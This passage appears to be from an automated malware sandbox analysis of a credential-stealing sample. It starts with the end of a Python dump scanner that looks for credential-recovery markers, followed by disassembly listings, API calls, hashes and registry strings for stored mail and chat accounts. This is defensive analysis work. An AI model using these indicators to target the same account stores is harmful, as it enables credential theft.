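    + b"Software\\Group Mail\x00InstallPath\x00fb.dat\x00"
    + b"\x90" * 8
    + b"%s@yahoo.com\x00"
    + b"Software\\Google\\Google Talk\\Accounts\x00"
)
BENIGN_DUMP = b"InstallPath\x00" + b"\x00" * 32

if __name__ == "__main__":
    print(decode_regopenkeyex("80000001,00000082,00000000,00020019,?,?,?,?,?,00000000"))
    for offset, marker in scan_dump(SAMPLE_DUMP):
        print(f"0x{offset:08x}  {marker}")
    print("credential recovery code:", looks_like_credential_recovery(SAMPLE_DUMP))
```

Feed a real dump (for instance the .sdmp file named under Memory Dump Source, with the file opened in binary mode) to scan_dump to confirm the strings are present at the offsets the report implies; the decoder tells you at a glance that the first routine reads per-user keys with KEY_READ rather than writing persistence, which is what distinguishes this harvesting code from the installer paths elsewhere in the sample.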
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@$DeleteIconLoadObject_mbscpymemset
• String ID:
• API String ID: 2054149589-0
• Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
• Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
• Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
• Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
  • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
  • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
  • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
• memset.MSVCRT ref: 00408392
  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
• memset.MSVCRT ref: 004083E3
• RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
• RegCloseKey.ADVAPI32(?), ref: 00408448
Strings
• Software\Google\Google Talk\Accounts, xrefs: 00408363
Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                      • API String ID: 2959138223-1079885057
                                                                                                                                                                                                                      • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                      • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 403 40b783-40b795 404 40b7e2-40b7f6 call 406a00 403->404 405 40b797-40b7ad call 407baf _mbsicmp 403->405 427 40b7f8 call 410411 404->427 428 40b7f8 call 404780 404->428 429 40b7f8 call 403c03 404->429 430 40b7f8 call 410166 404->430 431 40b7f8 call 40472f 404->431 410 40b7d6-40b7e0 405->410 411 40b7af-40b7c8 call 407baf 405->411 410->404 410->405 417 40b7ca-40b7cd 411->417 418 40b7cf 411->418 412 40b7fb-40b80e call 407bbf 420 40b810-40b81c 412->420 421 40b855-40b864 SetCursor 412->421 419 40b7d0-40b7d1 call 40b340 417->419 418->419 419->410 423 40b833-40b852 qsort 420->423 424 40b81e-40b829 420->424 423->421 424->423 427->412 428->412 429->412 430->412 431->412
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
• Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
• Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
• Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 458 41074f-410752 448->458 459 41075e-410761 448->459 450 410797-4107a5 449->450 451 41078d-410790 449->451 454 4107b5-4107bf call 410411 450->454 451->450 453 410792-410795 451->453 453->450 456 4107a7-4107b0 453->456 462 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 454->462 463 4107ef-410802 _mbscpy 454->463 456->454 458->449 461 410754-410757 458->461 465 410768 459->465 461->449 464 410759-41075c 461->464 462->463 466 410805-410807 463->466 464->449 464->459 465->466
APIs
  • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
  • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
• memset.MSVCRT ref: 00410780
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
• _mbscpy.MSVCRT ref: 004107F7
  • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 889583718-2036018995
• Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
• Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
• Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
• Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(?,?,?), ref: 004105EA
• SizeofResource.KERNEL32(?,00000000), ref: 004105FB
• LoadResource.KERNEL32(?,00000000), ref: 0041060B
• LockResource.KERNEL32(00000000), ref: 00410616
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
• Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
• Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
• Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0041036C
  • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
  • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
• memset.MSVCRT ref: 004103A7
• GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
• String ID:
• API String ID: 3143880245-0
• Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
• Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
• Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
• Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
• Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
• Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
• Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3831604043-0
                                                                                                                                                                                                                      • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                      • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                        • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                      • String ID: Arial
                                                                                                                                                                                                                      • API String ID: 3853255127-493054409
                                                                                                                                                                                                                      • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                      • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                      • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                      • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 145871493-0
                                                                                                                                                                                                                      • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                      • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                                        • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                                        • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                                        • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                      • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                      • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                      • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                      • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                      • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                      • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                      • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
